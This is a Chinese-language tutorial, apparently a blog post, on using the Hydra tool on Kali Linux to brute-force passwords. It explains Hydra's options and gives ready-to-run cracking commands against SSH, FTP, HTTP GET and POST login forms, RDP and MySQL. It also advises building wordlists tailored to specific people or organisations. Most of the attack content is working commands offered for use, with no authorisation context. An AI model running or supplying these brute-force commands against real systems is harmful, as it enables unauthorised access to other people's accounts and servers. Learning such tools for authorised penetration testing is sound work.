利用hydra高效破解服務與協議埠
hydra在希臘神話中是九頭蛇海德拉,不過你把它認為是中國山海經或者西遊記中的九頭蛇,也沒有問題。
hydra工具如此命名,源於可爆破眾多服務或協議埠,這款利器由黑客組織THC開發並開源。
我使用的電腦操作系統是kali linux
hydra是系統自帶的一個工具,所以跳過安裝環節(沒有的話,就從github上克隆一個下來),直接進入主題。打開終端,輸入hydra,第一段話是這樣的。
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
想要真正熟悉一個工具,一定要熟悉它的幫助文件,從下面的截圖第一段可以清晰的看出,它可以破解的埠非常豐富,超出想像。
進一步查看幫助文件,涉及更多指令細節
-l 指定用戶名
-L 指定用戶名字典
-p 指定密碼
-P 指定密碼字典
-C 取代-L/-P,例如admin.txt:password.txt
-q 連接錯誤的不顯示,因為有些ip不一定連接成功
-o 輸出結果文檔
-t 運行線程,默認值為16
-T 平行運行任務,默認值為64,前提是使用-m,因為任務太大
-v 詳細模式
-V 每次破解都顯示嘗試的賬號密碼
-e n 使用空密碼,例如admin對應空密碼
-e s 用戶名密碼相同,例如admin對應admin
-e ns 結合
-m 指定目標文檔,一行限1條,因為這樣才不亂
-f 成功破解一個就停止,前提是使用-m
-R 根據上次進度繼續破解,前提是使用-f,可聯合使用
-s 指定服務埠,因為有些埠不是默認的
-S 使用ssl協議連接,
-w 設置最大超時時間,默認值是30秒,因為有些ip連接等待時間太久
service 指定服務或協議
server 指定ip,可以對應c段
常用的指令基本已經搞清楚了,幫助文檔中也給出了幾個簡單的參考示例。但是,我們要明白,一個工具,懂得如何自定義,才能最大化利用。
1-破解ssh,默認22埠,用戶名一般是root
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip ssh -vV -o jieguo.txt
2-破解ftp,默認21埠,匿名伺服器的默認用戶名為anonymous
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip ftp -vV -o jieguo.txt
3-破解web,顯然這裡的鏈接部分需要不同情況不同構造
get提交:
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns -s 8080 ip http-get/admin/index.php -vV -o jieguo.txt
post提交:
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns -s 8080 iphttp-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"-vV -o jieguo.txt
4-破解rdp,默認3389埠,用戶名一般是administrator或root
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip rdp -vV -o jieguo.txt
5-破解mysql,默認3306埠,用戶名一般是root
hydra -L 用戶名字典 -P 密碼字典 -t 線程 -e ns ip mysql -vV -o jieguo.txt
上面5個都是常見的埠爆破,針對其他服務或協議,可以自定義,大同小異,不會就百度。當然,如果字典太大,爆破時間就會很長,單個ip爆破次數,等於用戶名字典乘以密碼字典。
爆破效果的好壞,與字典的大小和質量密切相關,密碼字典可以去github上查找,可以獲取很多,但是涉及到質量,就需要自己去定製。
這裡有兩個途徑,第一,自己從字典中篩選出最常用的那些用戶名密碼,目標小而精,對伺服器進行初步的爆破處理。如果失敗,可以放棄,也可以進入下一步,個性化定製字典(特定個人或組織),可以利用的工具crunch、cupp、cewl等,至於如何使用,後續會提及。只有如此,才能實現相對高效的密碼爆破,節約時間。
當然,hydra被很多人使用,說明它的可用性和易用性很強,是否有同類型的工具呢,當然!medusa和ncrack,針對這兩個工具的利用後續會提及。
TAG:象帕大人 |